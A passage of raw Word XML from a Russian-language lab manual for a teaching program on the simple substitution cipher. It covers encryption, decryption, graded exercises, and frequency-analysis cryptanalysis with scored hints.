        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Зашифрование информации методом простой подстановки производится следующим образом. Берется первый символ из шифруемого текста. Этот символ отыскивается в первом столбце таблицы шифрования. Символ, стоящий справа от выбранного символа, является шифром первого символа. Далее берется второй символ, и с ним проделывается то же самое до тех пор, пока не будет зашифрован весь исходный текст. После проведения таких операций с каждым символом исходного текста мы получим зашифрованный текст.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Расшифрование происходит аналогичным образом с использованием той же самой таблицы шифрования. Выбирается первый символ зашифрованного текста. Этот символ ищется среди символов замены во втором столбце таблицы шифрования. Символ, стоящий в первом столбце строки, в которой находится найденный символ, и будет символом исходного (расшифрованного) текста. Чтобы получить расшифрованным текст, такую же операцию надо провести с каждым символом зашифрованного текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Существует главное меню, состоящее из четырех пунктов: «Теория», «Оценка», «Помощь» и «Вернуться».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Часть «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Теория</w:t>
      </w:r>
      <w:r>
        <w:t>» открывает текстовый файл, содержащий теоретический материал занятия. Здесь описывается система шифрования методом простой подстановки.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2055"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D20130"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Пункт «Оценка» предназначен для того, чтобы пользователь выбрал режим выполнения задания на оценку или без оной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе пункта «Помощь» появляется окно справки системы, в котором пользователь может получить начальные сведения о работе с системой. При выборе пункта меню «Вернуться» пользователь выходит из программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Составление таблицы шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Первым шагом для этапов «Зашифрование» и «Расшифрование» является составление таблицы шифрования. Составление таблицы состоит в том, что пользователь сам присваивает символу исходного алфавита другой символ из алфавита шифрования. После редактирования таблицы шифрования пользователь может сохранить отредактированную им таблицу или загрузить уже созданную им ранее таблицу шифрования. Для сохранения таблицы шифрования необходимо нажать на кнопку «Сохранить». Таблица шифрования сохраняется пользователем на диске в каталоге, выбранном пользователем с расширением .</w:t>
      </w:r>
      <w:r>
        <w:t>tbl</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Раздел «Зашифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Меню выполнения раздела «Зашифрование» состоит из двух пунктов: «Зашифрование строки» и «Зашифрование файла», причем последний пункт выполняется в демонстрационных целях в автоматическом режиме. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">«Зашифрование строки». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для того чтобы выполнить задание на «Зашифрование строки», необходимо выбрать закладки: «Зашифрование» и «Строка». В строке редактирования «Исходная строка» появляется фраза, которую необходимо зашифровать. При этом результат необходимо вводить в поле ввода «Зашифрованная строка».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">После того, как пользователь ввел результат, необходимо нажать кнопку «Результат». Далее будет произведена проверка правильности ответа. Если ответ введен правильно, то красным шрифтом высвечивается сообщение «Правильно». Если введен неправильный ответ, то система выдает красным шрифтом сообщение «Неправильно». При этом предлагается просмотреть правильный ответ, нажав на </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>кнопку «Ответ».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">«Зашифрование файла». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В этом разделе производится наглядное автоматическое зашифрование текстовых файлов с использованием метода простой подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы просмотреть процесс зашифрования некоторого текстового файла, необходимо выбрать закладки: «Зашифрование» и «Файл». В верхнем окне редактирования «Исходный файл» содержится исходный текст. Зашифрованный текст помещается в нижнее поле ввода, которое называется «Зашифрованный файл». Во время работы по середине формы отражается ход выполнения зашифрования. В таблице отражается содержимое шифруемого файла в символьном виде, а также в кодированном виде. После завершения пользователю сообщается имя файла, где была сохранена зашифрованная информация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ftext</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – это номер шифруемого файла).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел «Расшифрование». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Меню выполнения раздела «Расшифрование» состоит из двух пунктов: «Расшифрование строки» и «Расшифрование файла», причем последнее, так же как и в разделе «Зашифрование», выполняется в демонстрационных целях в автоматическом режиме. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">«Расшифрование строки». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для того чтобы выполнить задание на «Расшифрование строки» необходимо выбрать закладки: «Расшифрование» и «Строка».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задание на расшифрование происходит аналогично заданию на зашифрование, за исключением того, что в строке редактирования «Зашифрованная строка» появляются задания на расшифрование, а результат расшифрования необходимо вводить в поле ввода «Расшифрованная строка». При расшифровании используется таблица шифрования, расположенная слева на форме, причем правый столбец соответствует символам из исходного зашифрованного текста, а левый – символам, которыми будут заменяться символы исходного текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Расшифрование файла». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В этом разделе производится наглядное автоматическое расшифрование текстовых файлов с использованием метода простой подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы просмотреть процесс зашифрования некоторого текстового файла, необходимо выбрать закладки: «Расшифрование» и «Файл». Расшифрование файла происходит аналогично зашифрованию файла, за исключением того, что зашифрованный файл появляется в верхнем окне «Зашифрованный файл», а расшифрованный текст помещается в нижнее поле ввода «Расшифрованный файл».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выполнении разделов «Зашифрование», «Расшифрование» и «Дешифрование» пользователь может работать в двух режимах: выполнять задание на оценку и задание без оценки. Задание без оценки выполняется для того, чтобы закрепить свои знания на практике. Задание на оценку выполняется для оценки понимания полученного материала.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для того чтобы выполнить тренировочное задание, необходимо выбрать один из разделов, т.е. «Зашифрование» или «Расшифрование», при этом в пункте меню «Оценка» не должен быть отмечен пункт «Да».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Проведя тренировку на заданиях без оценки, студент может оценить свои знания, выполнив задание с оценкой. Для этого необходимо отметить в пункте меню «Оценка» пункт «Да». При выполнении работы на оценку, последовательность работы определяется системой, а не пользователем. Таблица шифрования генерируются случайным образом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">При выполнении задания на оценку сначала пользователю становится доступной закладка «Зашифрование», где ему необходимо выполнить одно задание на зашифрование строки. Далее становится доступной закладка «Расшифрование», где выполняется одно задание на расшифрование строки. Происходит проверка правильности введенного ответа и система, проанализировав выполнение задания на зашифрование и расшифрование, выдает соответствующее сообщение об </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>оценке: зачет или незачет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел «Дешифрование». </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Процесс дешифрования информации, зашифрованной методом простой подстановки, заключается в определении таблицы шифрования, использовавшейся при зашифровании данной информации, и расшифровании информации по полученной таблице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Левую сторону формы занимают элементы для текста, правую – таблицы статистики и таблица шифрования символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При нажатии на кнопку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:t>Загрузить</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> происходит загрузка зашифрованного исходного текста из файла в текстовую область, расположенную слева вверху на форме, и создание таблицы статистики «Зашифрованный текст». Первый столбец этой таблицы содержит все символы зашифрованного текста (пробелы также шифруются), а второй столбец – вероятность повторения символов в тексте, которая указана в процентах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Далее обучаемому необходимо загрузить статистику частоты появления символов в таблицу статистики «Обычный текст», собранной на основе анализа текстов различного содержания. Для этого необходимо в выпадающем списке «Тип текста» установить область применения текста, т.е. выбрать один из пунктов - физика, философия, информатика, медицина или экономика. А в таблицу статистики «Обычный текст» автоматически заносится статистика частоты появления символов текста из той области применения, которую выбрал обучаемый. В реальности статистика частоты появления символов от тематики текста зависит мало.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Эти таблицы статистики нужны для того, чтобы заполнить таблицу шифрования, которая находится справа вверху на форме. Первый раз заполнение этой таблицы происходит автоматически при нажатии кнопки «Сопоставить». Левый столбец этой таблицы содержит символы из таблицы статистики «Обычный текст», а правый – символы из таблицы «Зашифрованный текст». Сопоставление символов происходит на основе сопоставления статистики частоты появления символов из таблицы статистики «Обычный текст» и статистики частоты появления символов из таблицы «Зашифрованный текст». Данная операция позволяет автоматически выполнить начальную итерацию на этапе определения таблицы шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>После нажатия кнопки «Сопоставить» пользователю</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> СТАНОВИТСЯ пассивной таблица статистики «Зашифрованный текст» и таблица статистики «Обычный текст»,</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> а вид закладки «Дешифрование» имеет следующий вид. При этом кнопка «Сопоставить» становится пассивной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнив все выше перечисленные действия, обучаемый должен нажать на кнопку «Дешифрование», что приводит к автоматическому дешифрованию текста на основе составленной таблицы шифрования. Дешифрованный текст помещается в окно редактирования, расположенное слева внизу на форме. Так как текст остается практически не расшифрованным после первого применения таблицы шифрования, то дальнейшая работа по дешифрованию зашифрованного текста проводится студентом самостоятельно. Автоматически в таблице шифрования символы в правом и левом столбцах расставляются по алфавиту. Это сделано для удобства редактирования таблицы шифрования. Если пользователь хочет отредактировать какой-либо из символов таблицы шифрования, то он должен два раза щелкнуть правой кнопкой мыши на том символе, который он собирается редактировать, и не нажимать кнопку «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Так как процесс дешифрования текста достаточно трудоемкий и слабо поддается какому-либо регламентированию, то для облегчения расшифрования текста в раздел «Дешифрование» были введены подсказки. Подсказки подразделяются на три вида: «СИМВОЛ» (вывод на экран одного символа из расшифрованного текста и соответствующего ему символа зашифрованного текста), «ЗАШИФРОВАТЬ ТЕКСТ» (пользователь сам вводит символы из зашифрованного текста, расшифровку которых он хочет получить), «ПОКАЗАТЬ ШИФР» (вывод на экран расшифрованной строки из зашифрованного текста). Также в области списка выбора подсказки находится информация об общем количестве баллов, набранных за подсказки. За использование каждой подсказки начисляется </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>определенное количество баллов. Причем, если выбирается подсказка на основании нескольких символов, то баллы даются за каждый символ подсказки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выборе подсказки «СИМВОЛ»  в области подсказки появляется выпадающий список, в котором пользователь выбирает символ из расшифрованного текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Эта ситуация соответствует доступу дешифровальщика к отдельным строкам таблицы шифрования. После выбора символа необходимо нажать кнопку «Показать» и в области результата подсказки, расположенной рядом с кнопкой «Показать» выдается значение этого символа из зашифрованного текста. За каждый открытый символ дается 2 балла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>При выборе подсказки «ПОКАЗАТЬ ШИФР» пользователю выдается расшифрованная строка из зашифрованого текста произвольной длины (максимальная длина строки 25 символов), причем длина этой строки при каждом следующем выборе подсказки «Показать шифр» варьируется. Эта подсказка может соответствовать ситуации, при которой дешифровщик располагает частью зашифрованного сообщения и соответствующему ей открытому тексту.</w:t>
